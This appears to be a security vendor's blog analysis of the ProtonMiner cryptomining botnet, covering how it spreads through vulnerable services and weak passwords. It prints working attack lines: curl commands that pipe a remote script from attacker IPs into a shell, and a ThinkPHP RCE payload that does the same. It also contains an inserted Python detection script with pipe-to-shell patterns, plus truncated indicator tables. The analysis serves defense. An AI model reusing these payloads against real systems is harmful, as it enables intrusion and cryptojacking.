Security is sometimes a very simple business: if you rely on weak passwords and use root access, there is a high chance that someone will develop malware to hack your database or web service.
This blog post provides a recent example of this truth: ProtonMiner, a new cryptocurrency miner hijacker discovered by the Alibaba Cloud security team, which has been extremely active since mid-February 2019. The post provides a clear analysis of the malware: how it infects, how it propagates to additional victims, its impact, and its recent distribution trend. It also offers security recommendations to avoid it.
Yohai Einav, Principal Security Researcher, Alibaba Cloud Security Innovation Labs
Security researchers at Alibaba Cloud have recently detected an outbreak of a new cryptocurrency miner hijacker, which they named "ProtonMiner". This miner was very likely created by the same attacker group mentioned by TrendMicro in their December 2018 blog post. The botnet initially propagated slowly using several old vulnerabilities in ElasticSearch, but since mid-February we have seen its popularity grow considerably as it expanded its attack surface.
This blog post provides details on how the botnet propagates itself, as well as our security recommendations for end users to avoid being infected.
Step 1: The attacker controls the compromised hosts and runs one of the following commands to download uuu.sh (or update.sh, which has identical content):
/bin/bash -c curl -fsSL http://18.104.22.168:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
/bin/bash -c curl -fsSL http://22.214.171.124:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
Step 2: The uuu.sh (or update.sh) script downloads three files: a trojan, a miner and a mining configuration file. The miner mines cryptocurrency on the compromised host, while the trojan continues to spread to other hosts that are not yet compromised.
The uuu.sh script first tries to update /etc/devtools and tests whether the current account has root privileges. Only when it is running as root does the main part of the script execute and mining start.
#!/bin/sh
echo 1 > /etc/devtools
if [ -f "$rtdir" ]
then
    echo "i am root"
    echo "goto 1" >> /etc/devtools
    # download & attack
fi
Other parts of the script consist of typical mining botnet behavior: it first detects and kills the processes of other mining groups, adds itself to crontab, and alters the iptables configuration to allow communication on certain ports. However, the attacker seems to be more cautious than other malicious script authors in the following aspects:
The propagation module of ProtonMiner is named "systemctI" and is written in Go. Its main function is as follows:
The trojan first initializes the IP list and weak password list used for scanning. The initialization is done by requesting and downloading the lists from the following URLs:
https://pixeldra.in/api/download/I9RRye (IP address CIDR blocks)
https://pixeldra.in/api/download/-7A5aP (weak passwords)
After that, it enters the mainScan() function, which contains multiple sub-functions to scan and exploit services.
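The host-side indicators described so far (the Step 1 download piped into a shell, the /etc/devtools file written by uuu.sh, and a binary whose name imitates systemctl) can be checked against endpoint telemetry. The following is an added detection sketch, not code from the original post or from Alibaba Cloud; the event tuple format, the allow-list of binary names, and the sample hosts, addresses and paths are assumptions constructed for illustration.

```python
import re

# Download from a bare IPv4 address piped straight into a shell (the Step 1 pattern).
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S*\s*\|\s*(?:ba)?sh\b")
MARKER_FILE = "/etc/devtools"   # file uuu.sh writes before and after its root check
KNOWN_BINARIES = {"systemctl", "systemd", "sshd", "crond"}   # assumed allow-list
CONFUSABLE = str.maketrans({"I": "l", "1": "l", "0": "o", "O": "o"})

def fold(name):
    """Collapse look-alike characters so 'systemctI' and 'systemctl' compare equal."""
    return name.translate(CONFUSABLE).lower()

FOLDED_KNOWN = {fold(n) for n in KNOWN_BINARIES}

def classify(kind, path, cmdline=""):
    """Return the names of the rules that a single event triggers."""
    hits = []
    if kind == "exec":
        if PIPE_TO_SHELL.search(cmdline):
            hits.append("download-piped-to-shell")
        base = path.rsplit("/", 1)[-1]
        # A name that only matches a known binary after folding is a masquerade.
        if base not in KNOWN_BINARIES and fold(base) in FOLDED_KNOWN:
            hits.append("lookalike-binary-name")
    elif kind == "file_write" and path == MARKER_FILE:
        hits.append("marker-file-write")
    return hits

def scan(events):
    """Group triggered rules per host, in first-seen order; clean hosts are omitted."""
    report = {}
    for host, kind, path, cmdline in events:
        for hit in classify(kind, path, cmdline):
            if hit not in report.setdefault(host, []):
                report[host].append(hit)
    return report

# Constructed events: (host, kind, path, command line). Addresses and paths are placeholders.
SAMPLE_EVENTS = [
    ("web-01", "exec", "/bin/bash", "/bin/bash -c curl -fsSL http://203.0.113.10:8506/PLACEHOLDER/uuu.sh |sh"),
    ("web-01", "file_write", "/etc/devtools", ""),
    ("web-01", "exec", "/tmp/systemctI", "/tmp/systemctI"),
    ("db-02", "exec", "/usr/bin/systemctl", "systemctl restart nginx"),
    ("db-02", "exec", "/usr/bin/curl", "curl -fsSL https://example.com/install.sh -o /tmp/install.sh"),
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        print(host, hits)
```

A host that triggers more than one of these rules, as web-01 does in the sample, is a much stronger signal than any single rule on its own.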
This is the list of impacted services and corresponding vulnerabilities:
|Spring Data Commons||CVE-2018-1273|
|SQL Server||Weak password|
|ThinkPHP||Two RCEs (Remote Command Execution) including CVE-2018-20062|
For example, here is a ThinkPHP payload (the infected host name is masked for privacy):
POST /index.php?s=captcha HTTP/1.1%0d%0aHost: 47.244.[xxx].xxx=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://126.96.36.199:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
After extending its attack surface, ProtonMiner's distribution gained momentum and reached a peak of about one thousand plus infections around mid-February of this year.
Figure 1: Daily distribution of devices infected by ProtonMiner
|update.sh||ce10c8da626e5c24eab3e2f7e496cb57 (same as uuu.sh)|
Usernames at pool: